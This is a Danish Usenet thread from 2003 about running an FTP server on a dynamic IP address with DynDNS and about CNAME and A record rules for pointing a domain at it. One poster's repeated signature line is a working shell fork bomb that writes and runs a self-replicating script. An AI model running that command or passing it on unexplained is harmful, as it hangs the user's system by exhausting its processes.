ftp server
Fra : keldorff

Dato : 21-03-03 13:14

Kan jeg opsætte en ftp server på min PC, når jeg ikke har fast IP adresse?

René

Fra : Klitgaard

Dato : 21-03-03 15:24

Ja. Kig på www.dyndns.dk

--
- Klitgaard
"Jeg er allergisk overfor alkohol og narkotika. Jeg får udslag i form af

Fra : Thunderbird[7100]

Dato : 21-03-03 15:33

On Fri, 21 Mar 2003 13:14:22 +0100, "keldorff" <keldorff@oncable.dk>
wrote:

>Kan jeg opsætte en ftp server på min PC, når jeg ikke har fast IP adresse?

Ja det kan du godt. i forbindelse hermed vil jeg anbefale www.dyndns.dk
.. Dette gør at dine "brugere" får en fast adresse på din server. Det
eneste du så bare skal huske at gøre er at holde din DYNDNS ip
opdateret.
Flemming Jacobsen

Fra : Jan Vestergaard

Dato : 21-03-03 17:11

"keldorff" skrev i en meddelelse
> Kan jeg opsætte en ftp server på min PC, når jeg ikke har fast IP
adresse?

Ja da - en IP er en IP - og serveren er ligeglad om den er fast eller
dynamisk.

Den eneste ulempe, er at din IP-adresse KAN skifte - men den skifter
ikke mens din server kører - den KAN skifte, når den er stoppet i en
periode.....

Så skal du lige give dine brugere besked om at adressen er ændret -
anden ulempe er der ikke.

Jeg har 4 dynamiske IP'er og min ftp-server har haft den samme
IP-adresse i over et år, så det giver ikke de store problemer.

Det kan så som andre har nævnt klares med Dyndns, der hele tiden
checker om din IP er ændret, så din Dyndns-adresse du har altid peger
på den rette IP.

--
M.v.h. Jan Vestergaard, Kildedalen 27, 3400 Hillerød
Email: jan@jNOSPAMve.dk Web: http://www.jve.dk

Fra : keldorff

Dato : 21-03-03 19:40

Tak til Jer alle tre. Jeg har oprettet mig hos dynDNS, og det virkede på
5min. Hvorfor fanden skulle man så bruge xtra penge hver mdr. på en fast IP
(ikke et spørgsmål - I behøver ikke svarer )

Tak for hjælpen

René

Fra : Jesper G. Poulsen

Dato : 22-03-03 08:57

In dk.edb.netvaerk, keldorff <keldorff@oncable.dk> says...
> Tak til Jer alle tre. Jeg har oprettet mig hos dynDNS, og det virkede på
> 5min. Hvorfor fanden skulle man så bruge xtra penge hver mdr. på en fast IP

For at have et sted til ens _eget_ domæne...

Og kige lige her:

Med venlig hilsen/best regards
Jesper G. Poulsen

Fra : Michal

Dato : 22-03-03 10:03

In news:MPG.18e635b240021a8b989e69@news.tele.dk,
Jesper G. Poulsen <ms2mogens@ingen steder.dk> wrote:

> In dk.edb.netvaerk, keldorff <keldorff@oncable.dk> says...
>
> For at have et sted til ens _eget_ domæne...

eller reverse DNS :)

eller for at slippe for at skifte A name records på alle sine domæner når:
teledanmarks servere går ned...
der er strømafbrydelse i ens by i 3 timer...

--
Michal
[ echo "\$0&\$0" > _; chmod +x _; ./_ ]

Fra : Thunderbird[7100]

Dato : 22-03-03 22:39

On Sat, 22 Mar 2003 10:02:50 +0100, "Michal"
<nonexistant@fakedomain.INVALID> wrote:

>eller reverse DNS :)
>
>eller for at slippe for at skifte A name records på alle sine domæner når:
>teledanmarks servere går ned...
>der er strømafbrydelse i ens by i 3 timer...

Det behøves man så faktisk heller ikke. Man kan finde binde sit ddomæne
til en Dyndns id. Så man kan faktisk hoste et domæne på en dynamisk ip
uden at få nedetid på grund af IP skift.
Flemming Jacobsen

Fra : Michal

Dato : 23-03-03 08:56

In news:rulp7v0koqvpg2vaimeg0s4qusqhht9u83@4ax.com,
Thunderbird[7100] <praetorian[Spam Frabedes]@tnfs.dk> wrote:

> Det behøves man så faktisk heller ikke. Man kan finde binde sit
> ddomæne til en Dyndns id. Så man kan faktisk hoste et domæne på en
> dynamisk ip uden at få nedetid på grund af IP skift.

Ja, men det er kun subdomæner på dyndns så vidt jeg husker? Eller kan man
også godt have domæner dér?

--
Michal
[ echo "\$0&\$0" > _; chmod +x _; ./_ ]

Fra : Thunderbird[7100]

Dato : 23-03-03 14:09

On Sun, 23 Mar 2003 08:55:47 +0100, "Michal"
<nonexistant@fakedomain.INVALID> wrote:

>Ja, men det er kun subdomæner på dyndns så vidt jeg husker? Eller kan man
>også godt have domæner dér?

Du får et subdomæne der. Men i din DNS opsætning kan du jo godt lede
opslag på dit domæne videre til dit subdomæne hos DynDNS.
Flemming Jacobsen

Fra : Michal

Dato : 23-03-03 16:35

In news:8ecr7v8ok77ohf416q6122nlhijnptjml4@4ax.com,
Thunderbird[7100] <praetorian[Spam Frabedes]@tnfs.dk> wrote:

> Du får et subdomæne der. Men i din DNS opsætning kan du jo godt lede
> opslag på dit domæne videre til dit subdomæne hos DynDNS.

man "må ikke" lade en A record pege på en anden A (eller C) record... A
records er kun til IPer.

--
Michal
[ echo "\$0&\$0" > _; chmod +x _; ./_ ]

Fra : Thunderbird[7100]

Dato : 23-03-03 16:47

On Sun, 23 Mar 2003 16:35:21 +0100, "Michal"
<nonexistant@fakedomain.INVALID> wrote:

>man "må ikke" lade en A record pege på en anden A (eller C) record... A
>records er kun til IPer.

Nej men du kan jo lave en C Record der hedder *.domæne.dk til din Dyndns
ID samt en C name record der hedder domæne.dk til din DynDNS id.
Flemming Jacobsen

Fra : Michal

Dato : 23-03-03 17:14

In news:umlr7vk02ohbf577v4kti18jq2th7biurh@4ax.com,
> [...]

> Nej men du kan jo lave en C Record der hedder *.domæne.dk til din
> Dyndns ID samt en C name record der hedder domæne.dk til din DynDNS

Hvilket jo betyder at jeg ikke længere kan have et domæne UDEN subdomæner
pegende på min server :)

--
Michal
[ echo "\$0&\$0" > _; chmod +x _; ./_ ]

Fra : Thunderbird[7100]

Dato : 23-03-03 17:13

On Sun, 23 Mar 2003 17:13:45 +0100, "Michal"
<nonexistant@fakedomain.INVALID> wrote:

>Hvilket jo betyder at jeg ikke længere kan have et domæne UDEN subdomæner
>pegende på min server :)

Jo du kan da. Du behøves ikke lave c name recorden med *.domæne.dk
Flemming Jacobsen

Fra : Michal

Dato : 23-03-03 17:37

In news:78nr7v8ji3rl042e2gd8qo81q4m8ms3r5f@4ax.com,
Thunderbird[7100] <praetorian[Spam Frabedes]@tnfs.dk> wrote:

[snip]

> Jo du kan da. Du behøves ikke lave c name recorden med *.domæne.dk

så vidt jeg husker kan man ikke laver C name records, medmindre de er
subdomæner?

men kan selvfølgelig godt være jeg husker forkert...

--
Michal
[ echo "\$0&\$0" > _; chmod +x _; ./_ ]

Fra : Thunderbird[7100]

Dato : 23-03-03 17:49

On Sun, 23 Mar 2003 17:37:26 +0100, "Michal"
> [...]

>subdomæner?
>
>men kan selvfølgelig godt være jeg husker forkert...

Hvis du er i tvivl så prøv at spørge inde i GratisDNS's forum.
Flemming Jacobsen

Fra : Jesper Dybdal

Dato : 23-03-03 18:16

> [...]

>[snip]

>så vidt jeg husker kan man ikke laver C name records, medmindre de er

I praksis ja, selvom det ikke er helt præcist udtrykt.

Man må ikke have CNAMEs med navne som også har andre poster.

Man kan derfor fx ikke have en CNAME med et navn direkte under dk
("domæne.dk"), fordi navne direkte under dk skal være separate zoner,
og sådan én har i hvert fald en SOA-post og nogle NS-poster.
--
Jesper Dybdal, Denmark.
http://www.dybdal.dk (in Danish).

Fra : Michal

Dato : 23-03-03 19:04

In news:knqr7vss8mven2r1pk60399iuah36rs6ar@dtext.news.tele.dk,
Jesper Dybdal <jdunet@u8.dybdal.dk> wrote:

> [...]
> ("domæne.dk"), fordi navne direkte under dk skal være separate zoner,
> og sådan én har i hvert fald en SOA-post og nogle NS-poster.

Det var noget i den retning jeg mente :)

--
Michal
[ echo "\$0&\$0" > _; chmod +x _; ./_ ]

Fra : Jesper G. Poulsen

Dato : 23-03-03 17:00

In dk.edb.netvaerk, "Thunderbird[7100]" <praetorian[Spam Frabedes]
@tnfs.dk> <"Thunderbird[7100]" <praetorian[Spam Frabedes]@tnfs.dk>>
says...
> Du får et subdomæne der. Men i din DNS opsætning kan du jo godt lede
> opslag på dit domæne videre til dit subdomæne hos DynDNS.

Du vil ikke kunne redelegere dit domæne til sådan en løsning.